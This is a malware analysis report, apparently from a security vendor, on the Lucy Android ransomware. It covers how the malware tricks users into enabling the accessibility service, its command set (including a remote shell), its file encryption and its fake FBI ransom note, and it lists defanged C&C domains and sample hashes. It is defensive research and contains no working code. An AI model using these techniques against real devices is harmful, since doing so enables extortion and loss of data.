Lucy’s Back: Ransomware Goes Mobile

April 28, 2020

Research by: Ohad Mana, Aviran Hazum, Bogdan Melnykov, Liav Kuperman

Overview

Ransomware attacks have been a part of the security landscape for a long time. We are familiar with infamous malware such as CryptoLocker, WannaCry and Ryuk, all of which have caused enormous damage to organizations and private assets globally. And while ransomware has just started to take its first steps in the mobile world, it’s evolving fast as malware developers and attackers apply the experience they have gained to create disruptive mobile ransomware attacks.

An example is the ‘Black Rose Lucy’ malware family, originally discovered in September 2018 by Check Point. Lucy is a Malware-as-a-Service (MaaS) botnet and dropper for Android devices. And now, nearly two years later, it is back with new ransomware capabilities that allow it to take control of victims’ devices to make various changes and install new malicious applications.

When downloaded, Lucy now encrypts files on the infected device and displays a ransom note in the browser window which claims to be an official message from the US FBI, accusing the victim of possessing pornographic content on his device. The message also states that as well as locking the device, the user’s details have been uploaded to the FBI Cyber Crime Department’s Data Center, accompanied by a list of legal offenses that the user is accused of committing.  The victim is then instructed to pay a US$500 “fine” – unusually, by providing their credit-card information, and not via the more common method of using BitCoin.

In this follow-up research, Check Point researchers have discovered more than 80 samples that were distributed mainly via social media links and IM apps associated with this new active Lucy variant in the wild.

At First Glance

The Android operating system only allows users to carry out a manual configuration to enable an application to have device administrator privileges. It explicitly asks for user consent in a pop-up window, or asks the user to navigate through a series of system settings before such privileges are granted.

However, the Android accessibility service, which mimics a user’s screen clicks and has the ability to automate user interactions with the device, could be used by malware to get around these security restrictions. Accessibility services are normally used to allow users to automate and simplify certain repeated tasks. With Lucy, it’s the Achilles Heel in the Android’s defensive armour.

Lucy uses a cunning method to slip inside the Android device and take down its defenses. It displays a message asking the user to enable SVO (Streaming Video Optimization).  By clicking ‘OK’, the user grants the malware the permission to use the accessibility service. Now Lucy is ready to initiate its malicious plan to encrypt the data on the victim’s device.

 

Figure 1. The malware’s popup message tricks the victim into enabling the accessibility service.

Taking A Closer Look: Technical Analysis of the Lucy Ransomware

When we got a lead from a tweet by Tatyana Shishkova (@sh1shk0va), an Android malware researcher stating that the Black Rose Lucy is back, we sprung into action. We collected samples and started our research and analysis.

We found that the samples we acquired disguised themselves as a harmless-looking video player application, primarily leveraging Android’s accessibility service to install their payload without any user interaction and created an interesting self-protection mechanism.

Initialization:

The malware starts by registering a receiver called “uyqtecppxr” to run BOOT_COMPLETE and QUICKBOOT_POWERON to check if the country code of the device is from a former Soviet state.

Lucy then tries to trick the victim into enabling the Accessibility Service by initiating an Alert Dialog that asks the user to take action.

Inside the MainActivity module, the application triggers the malicious service, which then registers a BroadcastReceiver that is called by the command action.SCREEN_ON and then calls itself. This is used to acquire the ‘WakeLock’ service, which keeps the device’s screen on, and ‘WifiLock’ service, which keeps the WIFI on.

Communication:

The malware has 4 encrypted command and control (C&C) servers in its code. Unlike previous versions of the malware, the C&C is a domain and not an IP address. Therefore, although the server can be taken down, it can easily be resolved into a new IP address, which makes it much harder to neutralize the malware.

The C&C servers are held as a long string which is a concatenation of all C&Cs hardcoded in the malware’s code, followed by a bulk of unused data.

Figure 2. The concatenation of all C&C servers in the malware’s code followed by a bulk of unused data.

Figure 3. The malware’s C&C servers.

 

The malware rotates between the C&Cs and each one is called by a different API with a different URI.

Figure 4. The malware shifts between C&C servers and URIs.

Command & Control:

The C&C server can send different commands for the malware to iterate and execute on the victim’s device. The list of commands that this malware recognizes can be seen in the table and screenshot below:

Command Description
Call Initiates a phone call to a number it gets from the C&C server.
GetCrypt Collects a string called “key” from the C&C response.
It then calls another service that tries to fetch an array of all the device’s directories.
Decrypt

 

Similar to ‘GetCrypt’ but used for decryption.
GetCont Declines previous payment – shows a message that the payment was declined.
GetApp Sends a list of all installed applications to the C&C server.
Delloc Empties the variable used in the request to the C&C server (on the sample we investigated, there was no assignment for this variable, so no actual functionality was seen).
DelKey Empties all variables that contain encryption keys
Deleted The malware deletes itself from the device.
StartShell Opens a remote shell on the device with the commands as arguments.

 

Files Encryption/Decryption

The malware receives a string called ‘Key’ as a response from the C&C server. This string is divided into 2 segments by this delimiter: //

Next, a new service is called, which initially tries to fetch an array of all the device’s directories. In the case of failure, it tries to fetch the directory /storage. As last resort, it tries to fetch the /sdcard directory.

Figure 5 The malware tries to fetch the victim’s device directories.

 

The encryption process begins by iterating over the files in the directory array it received at the previous stage.

Before encrypting the files, the malware performs a few checks, such as length and permissions, to make sure the file can be encrypted\decrypted. It also later checks if the file was successfully encrypted.

One interesting action that Lucy performs during the encryption process is initiating a key generator with a (false) key using an AES algorithm with a constant seed of 0x100. This action later appears to be a false lead, as the result is not even saved in a variable.

We prefer to give the actor behind this malware the benefit of the doubt, and assume this is a decoy action, designed as bait for anyone trying to analyze the malware’s mechanism. However, we cannot ignore the possibility that this might just be a careless mistake.

Figure 6. Generating the false key.

 

The actual encryption key is composed of the first segment of the ‘SecretKeySpec’ string, which is the ‘key’ string mentioned in the first stage, together with another string, called ‘Key’ that is fetched from SharedPreferences.

These keys, together with the directory array and a Boolean variable which acts as a switch between encryption and decryption modes, are later joined as parameters that are sent to the encryption/decryption function.

Figure 7. The malware’s encryption/decryption function.

 

When the malware has finished encrypting the desired files on the device and performed all the checks to verify that the files were encrypted successfully, it displays a ransom note in the browser window.

The ransom note pretends to be an official message from the US Department of Justice Federal Bureau of Investigations (FBI) and accuses the victim of possessing pornographic content on his device. As a result, all content on the device is encrypted and locked.

In addition, the message states that the victim’s details are now uploaded to the FBI Cyber Crime Departments Data Center, followed by a list of legal offenses that the victim is accused of committing.

Eventually, the victim is instructed to pay a US$500 “fine” and asked to do so by providing credit-card information, over the more common method of using BitCoin.

 

Figure 8. Lucy’s ransom note.

 

The encryption and decryption processes are very similar, except for minor changes such as adding (encryption) or removing (decryption) the .Lucy extension from the end of the file, as well as the value of the Boolean parameter that is called with the function.

In both the encryption and the decryption processes, we see the role of every key component we previously encountered.
The ‘SecretKeySpec’, which is the first part of the encryption key and taken from the C&C server’s response in the first stage, together with the ‘key’ string that is fetched from the SharedPreferences, make up the encryption/decryption key.
When the decryption process is complete, the malware sends logs to inform that all of the files were decrypted successfully. The malware then changes the current command to “Delete” and proceeds to delete itself.

Summary:

Although we have not yet seen many mobile ransomware out there, we have observed an evolution. Mobile ransomware is getting more and more sophisticated and efficient, as shown by Lucy, and this represents an important milestone in the evolution of mobile malwares. Sooner or later, the mobile world will experience a major destructive ransomware attack.

Stay Protected from Mobile Threats

Check Point SandBlast Mobile is A Mobile Threat Defense (MTD) solution, providing the widest range of capabilities to help you secure your mobile workforce. SandBlast Mobile provides protection for all mobile vectors of attack, including the download of malicious applications and applications with malware embedded in them. Learn more.

 

 

IOCs:

  • C&C Servers:

gapsoinasj[.]in
q9120qwpsa[.]in
ja0h12p14k[.]in
jqeoq0r1hgf03ds[.]in

 

Package Name Hash
co1m.andr53oid.gohpat a4224502518b48bc02fe569055dd9cdb5c06b8355625482affcfab15911b9111
co1m.andr53oid.gohpat 1604634cf52ca567c4121d6f11ba1a5166961da65e18098685c404d1eca36002
co1m.andr53oid.gohpat 0b213d7deb41b262638adcfce47048e61f949749f688e6440c4951646710f8b3
co1m.andr53oid.gohpat a6dcd24d400f2b1a3c14da08cb5655f4ac16053adbad0550c338d35175fa51f6
co1m.andr53oid.gohpat b7d3b1129798f0a16b3cb9e63d1cb0f202d820e2649f3af479a831e7ff8cc0bf
co1m.andr53oid.gohpat 4c8f0810c0071d199af5b1ab1a332a239a536ab96152abf5445bdee11e77e87d
co1m.andr53oid.gohpat af18bb67d0b465d83409dd27610d3de7aa22548cc7f1a2f6499c5bb6cea88a4c
co1m.andr53oid.gohpat 1163d9d45b57fa267044bede0ca3493c1bae3e604f632f348f28107566036fcf
co1m.andr53oid.gohpat 5c6f4b0ffcb31f4d10c9c1e95f298f8cf8b3a1a97a2272e540fed0cca4829bbf
co1m.andr53oid.gohpat 4c6c04fc22e19dc5d1de7237da6f0d3cdddfeb655be957b6e592ef91c74fd71c
co1m.andr53oid.gohpat 9f4c7e8f7765fb4e878d3f4f0cb424c4bb0802db10e407c98c7c50e181d3e334
co1m.andr53oid.gohpat 932226edcc0b7308ef919eb8e6fb2966057215d4b18881ac6eaf7624513838a6
dtlrquunob.ntrbhppvnr.dbawnbxoxz dac40ca71dab0a40ed4d7de64b463f7b91ecd473a279451788369087edfff8d0
gcoojdprtw.tsqrstjtdi.crwrnqoqur 05bbe4182b890c91ff96ef7bf39e5dd94feae83d5067ccdc9703a05278b9983d
tpviytfsqr.kbnsbdnudm.tswponqgfg 70fef3fd8100b8ede14b4cb37cc2b2c6baa208920bd345439a2a19c1d47a1618
uuctvbgtlb.nkoqrtdctt.unootbawgh 8f0befb9381f9b0b1253a07487456b585a2352bdbdd0e3cc2e17b29b489a8376
wcqrucdpzh.otstodvvsm.vrbnjqrsrr f1dd83ae85d1c91e09643657e19242f90a39a238d28cd3ece9b91379c768e471
wcqrucdpzh.otstodvvsm.vrbnjqrsrr c18c5ca32b80d4b595500853e1899d03edbe954d1e79da14f167aa888918d547
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 7890332435bfebef9a5f7d9cac07e550cdbe67b071d879aa271dba3419c58a42
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 8b7951961ebe92348e4d498ca99fd8de4087a4503cead784bd1dcd538084d1bd
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 02cfbe349d6e9c57286121ee727260f7effba00e765053ad38ca03bd44936a57
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 953b844c859fdf39a9409e39c78296a4612f6d4e8dc4b4ed1576a3c646640fb2
wcqrucdpzh.otstodvvsm.vrbnjqrsrr ad47c461c9b5b622f811abd9f8b3184682755d71c3f0fadea0bc74e0ff235d9f
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 2ee564b1f97546342ebeff6e763702b65de61f8889203ccb95d41b3e80168269
wcqrucdpzh.otstodvvsm.vrbnjqrsrr cb189527d786306c92cf8aba253c7f606aa93d24fc87152991c30f0a5598b42a
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 7cdda437613cf8a20482f2abb43cedafca2220384eda590caf23eb119730f482
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 9510c6e4915348a6336feaa0af9fa1c87b8b19a2df2a991f6afa76b5eeeb61df
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 71e6710ea1acbf0525992c3785dab6928311ca42a8391c3c06a299b8d9d1fa71
wcqrucdpzh.otstodvvsm.vrbnjqrsrr a2bd3ed53c78b4e9daf8b1d732464423ef8bc7e7f8efc78188107632d8dbf749
wcqrucdpzh.otstodvvsm.vrbnjqrsrr bd044e9967b333314bb264266790f2b5bbeb5436016948cef0aea9e1a6cb9b9a
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 72c84191fe66c690f5101cf307293c003f82d80f1d00ee010e3067bb0c668d75
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 3ad1aa75f699be78c20a2aa7ab94f30186896d7adee10617b02448fa5e5c08fe
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 93e424910745124e992b4eb698fbeb297c023c89c006263eeebb13806179e2b6
wcqrucdpzh.otstodvvsm.vrbnjqrsrr c2a874ff310632bce3f5b64d426f296b74c5c8d7e1cd8bffa3875987ee7cd0f8
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 283892cbf8ff13ddf499835185d54bb2fa4c86864eaecf5de231c67f6d14da82
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 963a672c540f16fea31f7a73a5cbf89e8571afaf56f104c08f30e7b8faaa1cee
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 57d9420ac144d2a62fddb4959a405de1243bc75f7b579abb4489c1ea16320b35
wcqrucdpzh.otstodvvsm.vrbnjqrsrr d8b5ce2a2146707cea7258ff580578f567e6ce6350cbd1c0e63f5ca1988db7ea
wcqrucdpzh.otstodvvsm.vrbnjqrsrr df8f717de4f93b2abd99630784ed402c5b5781bb09493c1a7daeb3ae6d565afd
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 0a5a317859cc0cb52fbf80cb8fce9916cc113193fb56231711cc83a44601ba91
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 3688e2fd329263b77000533f2263ab823755165ac32c12e8087096caac6634e7
wcqrucdpzh.otstodvvsm.vrbnjqrsrr c1e4ff0d28523364749e8be8db07eb0157f159a28bece0f6c386258c70a24a9d
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 72fa9bfc1c5be8e24fa152287ef6124b05d88cee15b9bb16729c647bf13a78bb
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 2e5c0b796c4830f11066e8c78fb215ac0a1bb555ca0d89973c7c40a046b99d0c
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 8437688a49a03e80c3d53a28f533d6e92b6c299f1c9c67305034b78e71e95d24
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 3afb57ed431dd88bcf82203fa4f19c9164eae672768f87153334813bae91fee1
wcqrucdpzh.otstodvvsm.vrbnjqrsrr f1e0d9b230c64e95dc3a57e463947d5044b82a15e0aa975df209c9ad849c19c8
wcqrucdpzh.otstodvvsm.vrbnjqrsrr b87eee136d69a73a130d5f935758ff87f6913445f1c6321f89cef7450272ce9f
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 5604a3fde8dd61691313e6812f13143d093d58b8047f07489f5d2b0e5490b6bf
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 99f412e6e69bc3f1354024003310f31655159e2d46e3e896aeee5ab8b4612c9a
wcqrucdpzh.otstodvvsm.vrbnjqrsrr a3e6eee97a50b2156e1ee24f0c02996e36f478ca5f8904e4f403e7c29195dd55
wcqrucdpzh.otstodvvsm.vrbnjqrsrr ad04c15e3488cb7642298d211ef84d99fcb8991039caf1ae70ff5a3982690a97
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 7a4b8aa0981b010b7a92400a4d8690d29719fe42807495338c6192b8c6eb1286
wcqrucdpzh.otstodvvsm.vrbnjqrsrr baecc174fc1c12ac228fc914935cbdce7111a9ebe27e1c78489d190ec6f66f50
wcqrucdpzh.otstodvvsm.vrbnjqrsrr c6e27280f6f7d3199bff21018fb1fa6f9338b81f3572b010ab5467fe54649a19
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 67d99c5f4233ae02b21d8cb6e72203372ae3b7a2a12bbe2bf419a70aee1a0984
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 5c2333a7a5fcc71ec16d02a48134981cfe7ecfc2ddb8114ef46c57af0eccd4ef
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 8e8bf651aaa5e29dc13029c167ad8bdf156b78c138db470cfbabeb0a1168cdab
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 994bafbc78124960397ad0eaea6e00536ebc59c485459196bcc02b0cffa734a7
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 6b0ddf78efc98c1fe34ac7500be38254ee57cc4d436a51b5943c8851e4d46128
wcqrucdpzh.otstodvvsm.vrbnjqrsrr d97ad77c670822682c89ddd86b32dd6be0aef67a8c27161b389de6799089c7a3
wcqrucdpzh.otstodvvsm.vrbnjqrsrr b4cf0ef34f8c52d713f1755ff8f8e8ef01987ba95179b3d6f72229652a9ce95a
wcqrucdpzh.otstodvvsm.vrbnjqrsrr ff43b8da4337de1f0242da64c84c6fa0d2e3521546a2b8fc44d635fd18130c10
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 3144526d354e29e5cc3985a8f06513627b98441d6db745b96fe85e78bf17b066
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 5bbe9e80288991de75fb7d4f1b2ea3a87cfcbd2a64a3e2b13861535cccecd136
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 67a592cb8ba37d1340bb8bbda13397c827e07b71066ec86eb709324652b8771c
wcqrucdpzh.otstodvvsm.vrbnjqrsrr d2c0ced8bbd2a30c2ec726065d5bf0e124a5949418eb19fc8b94a5541695c1b9
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 20acb6c9de4eb8764a7d91034c4065adb0b9e5f7afb8183ff9abc1d09bff20fd
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 436f08e1fe0fc9d666f61b9e6a4f50311f867d3c878876b93e3cfebf88bf5362
wcqrucdpzh.otstodvvsm.vrbnjqrsrr d9f510ee26cc33207e6f57340a711ac1f1f53afa5025f2ac34bbd2c012c98229
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 73210898f15b4b340fee4f0d4cbbbeb4ae1dae652629208d6a42bfdd1af08ad5
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 737b2e57ffcae73cf5825b4041c508f160a614a45c9eef644e79eb772101a7f3
wcqrucdpzh.otstodvvsm.vrbnjqrsrr cc38a5d43f305c5c1d7009de73d594dc7fe018b46f37fe1674e287ae254f4dde
wcqrucdpzh.otstodvvsm.vrbnjqrsrr e9fa1f21781337fd39988b0037356ff5983fe0a1bd2e5bb9ae839756168d0e6e
wcqrucdpzh.otstodvvsm.vrbnjqrsrr d145b2ddc88b415d5c5646b8dd2c81bca212dae409a3f4431bcb3982c32c0762
wcqrucdpzh.otstodvvsm.vrbnjqrsrr d9f82a7419a62ca19bee11aa3e935a42b3a45653ccb04f1ba1de9c222fae9ea0
wcqrucdpzh.otstodvvsm.vrbnjqrsrr db8913102a2f683f40f31fbb3063dbe67a382f6f4d61f4b52bb8a7cba2d14f29
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 3ea8579928b7f671e7df8637a7bd9b5d4fbf4e1b7bdeea2cc3c62b23ea0e9b96
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 2257eaa9788d8f0ae55a2d85794a3db82155a4586a29abab93c9ef61ab9bcb01
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 0ac1a48c7b3d17afb258be9f0fcb03720129d9939f7fbac741dbb6042012045a
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 36b4ad5ece2a6fbcdf011ac08dd48f584a96cab09d4e3e0542b5b9b46a318244
wcqrucdpzh.otstodvvsm.vrbnjqrsrr d9866310eab9463f54703bb5c105c09b272205b0904ea9bd7f1ed2947022abcb